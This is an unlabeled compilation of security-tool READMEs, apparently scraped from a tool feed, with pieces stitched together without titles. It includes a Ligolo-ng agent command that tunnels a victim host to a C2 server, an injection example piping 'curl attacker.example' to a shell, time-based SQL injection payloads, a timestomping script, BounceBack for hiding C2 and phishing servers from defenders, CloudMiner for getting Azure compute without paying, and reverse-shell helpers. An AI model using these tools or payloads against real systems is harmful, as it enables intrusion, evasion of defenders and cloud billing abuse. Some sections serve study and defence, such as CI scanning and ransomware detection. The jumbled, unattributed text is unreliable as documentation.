You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans) ;
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear: the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, third-party integration risks, affecting the most popular project on GitHub and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat: an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality β each exploitation can impact millions of victims.
It was for these reasons that Raven was created: a framework for CI/CD security analysis of workflows, with GitHub Actions as the first use case. In our focus, we examined complex scenarios where each issue isn't a threat on its own, but combined, they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
options:
-h, --help               show this help message and exit
--token TOKEN            GITHUB_TOKEN to download data from Github API (needed for effective rate-limiting)
--debug                  Whether to print debug statements, default: False
--redis-host REDIS_HOST  Redis host, default: localhost
--redis-port REDIS_PORT  Redis port, default: 6379
--clean-redis, -cr       Whether to clean cache in the redis, default: False
--org-name ORG_NAME      Organization name to download the workflows
options:
-h, --help               show this help message and exit
--token TOKEN            GITHUB_TOKEN to download data from Github API (needed for effective rate-limiting)
--debug                  Whether to print debug statements, default: False
--redis-host REDIS_HOST  Redis host, default: localhost
--redis-port REDIS_PORT  Redis port, default: 6379
--clean-redis, -cr       Whether to clean cache in the redis, default: False
--max-stars MAX_STARS    Maximum number of stars for a repository
--min-stars MIN_STARS    Minimum number of stars for a repository, default: 1000
It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
It is possible to run an external action by referencing a Docker container through the docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case: a user can pass a pull request title (which is a controllable parameter) to an action parameter named data. That action parameter may then be used in a run command, e.g. - run: echo ${{ inputs.data }}, which creates a path to code execution.
Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode
If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.
The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / access keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries that the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
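For intuition, a small Python sketch of that guest-mode listing step: fetch the bucket's public XML listing and collect the returned object keys (the URL style and XML namespace below follow the AWS S3 listing format and are simplifications):

import urllib.request
import xml.etree.ElementTree as ET

def list_bucket_keys(bucket_url: str, limit: int = 1000):
    # Unauthenticated listing request; S3-compatible buckets answer with an XML document
    with urllib.request.urlopen(f"{bucket_url}?list-type=2&max-keys={limit}") as resp:
        tree = ET.parse(resp)
    ns = {"s3": "http://s3.amazonaws.com/doc/2006-03-01/"}
    return [key.text for key in tree.getroot().findall(".//s3:Key", ns)]

for key in list_bucket_keys("https://example-bucket.s3.amazonaws.com"):
    print(key)   # each plain-text file can then be fetched and scanned for secrets and keywords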
Features
Secret Scanning
Scans for over 80 unique regex signatures that can help in uncovering secret exposures, tagged with their severity, from the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
Sensitive File Checks
Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with a list of 80+ unique regex signatures in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.
Dig Mode
Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.
Asset Extraction
Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.
Searching
The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.
With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.
To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project, which allows simulating attacks following MITRE TTPs (Tactics, Techniques, and Procedures), PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.
Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.
Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.
To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.
TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.
Requirements
The project is based on Azure Pipelines and requires the following to be able to run:
Azure Service Connection to a resource group as described in the Microsoft Docs
Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and made accessible to the pipelines
Optional
You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.
Refer to the variables file for your configurable items.
Design
Infrastructure
Deploying the infrastructure uses the Azure Pipeline to perform the following steps:
Deploy Azure services:
Key Vault
Log Analytics Workspace
Data Connection Endpoint
Data Connection Rule
Generate SSH keypair and password for the Windows account and store in the Key Vault
Create a Windows 11 VM
Install OpenSSH
Configure and deploy the SSH public key
Install Invoke-AtomicRedTeam
Install Microsoft Defender for Endpoint and configure exceptions
Currently only the Atomics from the public repository are supported. The pipeline takes a technique ID as input, or a comma-separated list of techniques, for example:
T1059.003
T1027,T1049,T1003
The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
There are currently two ways to run the simulation:
A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment risks contaminating the environment and making the simulations less stable and predictable.
TODO
Must have
Check if prerequisites have been fulfilled before executing the atomic
Provide the ability to import own group policy
Clean up Bicep templates and pipelines by using a master template (complete build)
Build a pipeline that runs techniques sequentially with reboots in between
Add Azure ServiceConnection to variables instead of parameters
Nice to have
MDE Off-boarding (?)
Automatically join and leave AD domain
Make the Atomics repository configurable
Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
Add C2 infrastructure for manual or C2 based simulations
Issues
Atomics do not report whether a simulation succeeded or not
A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.
Change timestamps for individual files or directories.
Recursively apply timestamps to all files in a directory.
Option to use specific credentials for remote paths or privileged files.
I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.
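For reference, a minimal sketch of the same idea in Python (note that os.utime only sets access and modification times; adjusting creation time on Windows needs platform-specific APIs not shown here):

import os
import time

def timestomp(path: str, when: str = "2010-01-01 12:00:00", recursive: bool = True):
    ts = time.mktime(time.strptime(when, "%Y-%m-%d %H:%M:%S"))
    targets = [path]
    if recursive and os.path.isdir(path):
        for root, _dirs, files in os.walk(path):
            targets.extend(os.path.join(root, name) for name in files)
    for target in targets:
        os.utime(target, (ts, ts))   # apply the chosen access and modification times

timestomp(r"C:\temp\loot")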
Tool for analyzing SAP Secure Network Communications (SNC).
How to use?
In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Router
SAP Routers can either support SNC or not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out whether it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
DIAG / SAP GUI
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact the connection's security is given in the Background section.
Requirements: currently, sncscan only works with the pysap library from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
Background: SNC system parameters
SNC Basics
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure authentication, integrity and encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between the various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. Three levels of data protection can be applied to an SNC-secured connection:
Authentication only: Verifies the identity of the communication partners
Integrity protection: Detects manipulation of the transmitted messages
Confidentiality protection: Encrypts the transmitted messages
SNC Parameter
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
snc/data_protection/min: Minimum security level required for SNC connections
snc/data_protection/max: Highest security level, initiated by the SAP system
snc/data_protection/use: Default security level, initiated by the SAP system
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
Reading out SNC Parameters
As long as the addressed SAP system is capable of sending SNC messages, it responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
MELEE: A Tool to Detect Ransomware Infections in MySQL Instances
Attackers are abusing MySQL instances to conduct nefarious operations on the Internet. Cybercriminals target exposed MySQL instances and trigger infections at scale to exfiltrate data, destroy data, and extort money via ransom. For example, one of the most significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release of the tool, the following modules are supported:
Nemesis is an offensive data enrichment pipeline and operator support system.
Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.
Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators' analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.
Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!
We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.
This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.
Visit our website - secureci.org for more information.
Features
Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks (an illustrative example follows this list).
Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.
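A classic instance of the kind of flow this taint tracking targets is untrusted event data expanded directly into a run step. The workflow below is an illustrative example only (not taken from the paper): the attacker-controlled issue title is interpolated into the shell command, so a title such as "; curl attacker.example | sh leads to command injection.
name: greet
on:
  issues:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # The expression is expanded before the shell runs, so the untrusted
      # title becomes part of the command itself.
      - run: echo "New issue: ${{ github.event.issue.title }}"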
Usage
This Python script provides a command line interface for interacting with GitHub repositories and GitHub Actions.
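The exact entry point and flag names below are assumptions based on the docker invocation shown further down, so treat this as a sketch rather than the documented syntax:
python argus.py --mode repo --url https://github.com/{org}/{repo} --branch master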
This would run the script in repo mode on the master branch of the specified repository.
How to use
Argus can be run inside a docker container. To do so, follow the steps:
Install docker and docker-compose
apt-get -y install docker.io docker-compose
Clone the release branch of this repo
git clone <>
Build the docker container
docker-compose build
Now you can run argus. Example run:
docker-compose run argus --mode {mode} --url {url to target repo}
Results will be available inside the results folder
Viewing SARIF Results
You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.
Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.
VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.
Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.
Troubleshooting
If there is an issue with needing GitHub authorization to run, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all requests made to GitHub. Note: we do not store this information anywhere, nor do we create anything in your GitHub account - we only use it for cloning the repositories.
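For example (the token value is a placeholder, and passing the variable explicitly avoids depending on whether the compose file forwards host environment variables):
export GITHUB_CREDS="username:TOKEN"
docker-compose run -e GITHUB_CREDS="$GITHUB_CREDS" argus --mode {mode} --url {url to target repo}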
Contributions
Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!
Cite Argus
If you use Argus in your research, please cite our paper:
@inproceedings{muralee2023Argus,
  title={ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
  author={S. Muralee and I. Koishybayev and A. Nahapetyan and G. Tystahl and B. Reaves and A. Bianchi and W. Enck and A. Kapravelos and A. Machiry},
  booktitle={32nd USENIX Security Symposium (USENIX Security 23)},
  year={2023},
}
navgix is a multi-threaded Golang tool that checks for nginx alias traversal vulnerabilities.
Techniques
Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases):
Heuristics
navgix will make an initial GET request to the page, and if any directories are referenced in the page HTML (in src attributes of HTML elements), it will test each folder in the path for the vulnerability. For example, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/, and /static/img/photos/.
Brute-force
navgix will also test a short list of directories that commonly have this vulnerability, and if any of them exist, it will attempt to confirm whether the vulnerability is present (a simplified sketch of such a check is shown below).
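The following is a minimal sketch of an alias traversal check, assuming the classic misconfiguration "location /static { alias /app/static/; }" (no trailing slash on the location), which lets /static../ escape into the parent directory; it illustrates the idea and is not navgix's actual implementation:
import requests

def looks_traversable(base_url: str, directory: str, timeout: int = 5) -> bool:
    # e.g. directory "/static/img/" -> probe "http://target/static/img../"
    probe = base_url.rstrip("/") + directory.rstrip("/") + "../"
    try:
        resp = requests.get(probe, timeout=timeout, allow_redirects=False)
    except requests.RequestException:
        return False
    # A plain 404 usually means the alias did not resolve outside the directory;
    # 200/301/403 responses are worth confirming manually, e.g. by fetching a
    # file known to live one level above the aliased folder.
    return resp.status_code in (200, 301, 403)

if __name__ == "__main__":
    for d in ("/static/", "/static/img/", "/static/img/photos/"):
        print(d, looks_traversable("http://example.com", d))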
Installation
git clone https://github.com/Hakai-Offsec/navgix; cd navgix; go build
Optional Arguments:
/threads - specify maximum number of parallel threads (default=25)
/dc - specify domain controller to query (if not run on a domain-joined host)
/domain - specify domain name (if not run on a domain-joined host)
/ldap - query hosts from the following LDAP filters (default=all)
  :all - All enabled computers with 'primary' group 'Domain Computers'
  :dc - All enabled Domain Controllers (not read-only DCs)
  :exclude-dc - All enabled computers that are not Domain Controllers or read-only DCs
  :servers - All enabled servers
  :servers-exclude-dc - All enabled servers excluding Domain Controllers or read-only DCs
/ou - specify LDAP OU to query enabled computer objects from, ex: "OU=Special Servers,DC=example,DC=local"
/stealth - list share names without performing read/write access checks
/filter - list of comma-separated shares to exclude from enumeration (default: SYSVOL,NETLOGON,IPC$,PRINT$)
/outfile - specify file for shares to be appended to instead of printing to stdout
/verbose - return unauthorized shares
BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.
The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.
For more information on tool usage, you may visit the project's wiki.
Features
Highly configurable and customizable filter pipeline with boolean-based concatenation of rules, able to hide your infrastructure from even the keenest blue eyes.
Easily extendable project structure; everyone can add rules for their own C2.
Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT security vendors, combined with an IP filter to keep them from using or attacking your infrastructure.
Malleable C2 profile parser able to validate inbound HTTP(S) traffic against the Malleable config and reject packets that fail validation.
Out of the box domain fronting support allows you to hide your infrastructure a little bit more.
Ability to check the IPv4 address of a request against IP geolocation/reverse lookup data and compare it to specified regular expressions, in order to filter out peers connecting from outside allowed companies, countries, cities, domains, etc.
All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.
Support for multiple proxies with different filter pipelines at one BounceBack instance.
Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debugging issues.
Rules
BounceBack currently supports the following filters:
Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and found two high-severity vulnerabilities.
This research project began when Aguinaga's wife, a former research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, he opted for a more unconventional approach to the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.
They uncovered two LAN remote code execution vulnerabilities in EZVIZ's implementation of Hikvision's Search Active Devices Protocol (SADP) and SDK server:
CVE-2023-34551: EZVIZ's implementation of Hikvision's SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
The affected code is present in several EZVIZ products, which include but are not limited to:
Product Model - Affected Versions
CS-C6N-B0-1G2WF - Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF - Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR - Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C - Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL - Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p - Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p - Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR - Versions below V5.2.3 build 230217
EZVIZ LC1C - Versions below V5.3.4 build 230214
These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean's Eleven:
Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server while leaving all other camera features operational.
A detailed deep dive into the whole research process can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, and developing an exploit capable of bypassing ASLR. It also includes all the details of the Hollywood-style post-exploitation: tracing, in-memory code patching, and manipulating the execution of the binary that implements most of the camera's features.
This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.
Execute code within Azure Automation service without getting charged
Description
CloudMiner is a tool designed to get free computing power within the Azure Automation service. The tool utilizes the upload module/package flow to execute code, which is entirely free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23, and Microsoft decided not to change the service behavior, as it is considered "by design". As of 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
Requirements
Python 3.8+ with the libraries mentioned in the file requirements.txt
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help            show this help message and exit
--path PATH           the script path (PowerShell or Python)
--id ID               ID of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
-c COUNT, --count COUNT
                      number of executions
-t TOKEN, --token TOKEN
                      Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
                      Path to requirements file to be installed and used by the script (relevant to Python scripts only)
-v, --verbose         Enable verbose mode
Example usage
Python
Powershell
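The exact entry-point name below is an assumption; invocations along these lines match the options listed above (the subscription/resource group/account values and script paths are placeholders):
python cloud_miner.py --path ./script.py --id /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName} --count 1 --requirements requirements.txt
python cloud_miner.py --path ./script.ps1 --id /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName} --count 1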
License
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threading, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminate false positives and can send alerts upon detection through its built-in Discord notification functionality.
options:
-h, --help            show this help message and exit
-u URL, --url URL     Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
                      File containing a list of URLs
-p, --pipeline        Read from pipeline
--proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
                      Single payload for testing
--discord DISCORD     Discord Webhook URL
--headers HEADERS     File containing headers (default is headers.txt)
--threads THREADS     Number of threads
Running SqliSniper
Single URL Scan
The URL can be provided with the -u flag for a single-site scan.
./sqlisniper.py -u http://example.com
File Input
The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
Piping URLs
SqliSniper can also work with pipeline input using the -p flag.
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
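For example, assuming the ProjectDiscovery tools subfinder and httpx are installed, a chain like the following would feed live hosts straight into SqliSniper:
subfinder -d example.com -silent | httpx -silent | ./sqlisniper.py -p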
While using a custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this:
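Illustrative time-based payloads (examples only, not necessarily the shipped defaults):
' AND SLEEP(%__TIME_OUT__%)-- -
" AND SLEEP(%__TIME_OUT__%)-- -
' OR IF(1=1,SLEEP(%__TIME_OUT__%),0)-- -
';WAITFOR DELAY '0:0:%__TIME_OUT__%'--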
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or to overlooking valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.
SqliSniper is made in Python with lots of <3 by @Muhammad Danial.
Essential utilities for pentester, bug-bounty hunters and security researchers
secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that bundles the most used and tedious tasks commonly performed during cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).
The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!
Essential utilities for pentester, bug-bounty hunters and security researchers
Usage: secbutler [flags] secbutler [command]
Available Commands:
cheatsheet   Read common cheatsheets & payloads
help         Help about any command
listener     Obtain the command to start a reverse shell listener
payloads     Obtain and serve common payloads
proxy        Obtain a random proxy from FreeProxy
revshell     Obtain the command for a reverse shell
tools        Generate an install script for the most common cybersecurity tools
version      Print the current version
wordlists    Generate a download script for the most common wordlists
Flags: -h, --help help for secbutler
Use "secbutler [command] --help" for more information about a command.
Installation
Run the following command to install the latest version:
go install github.com/groundsec/secbutler@latest
Or you can simply grab an executable from the Releases page.
License
secbutler is made with <3 by the GroundSec team and released under the MIT LICENSE.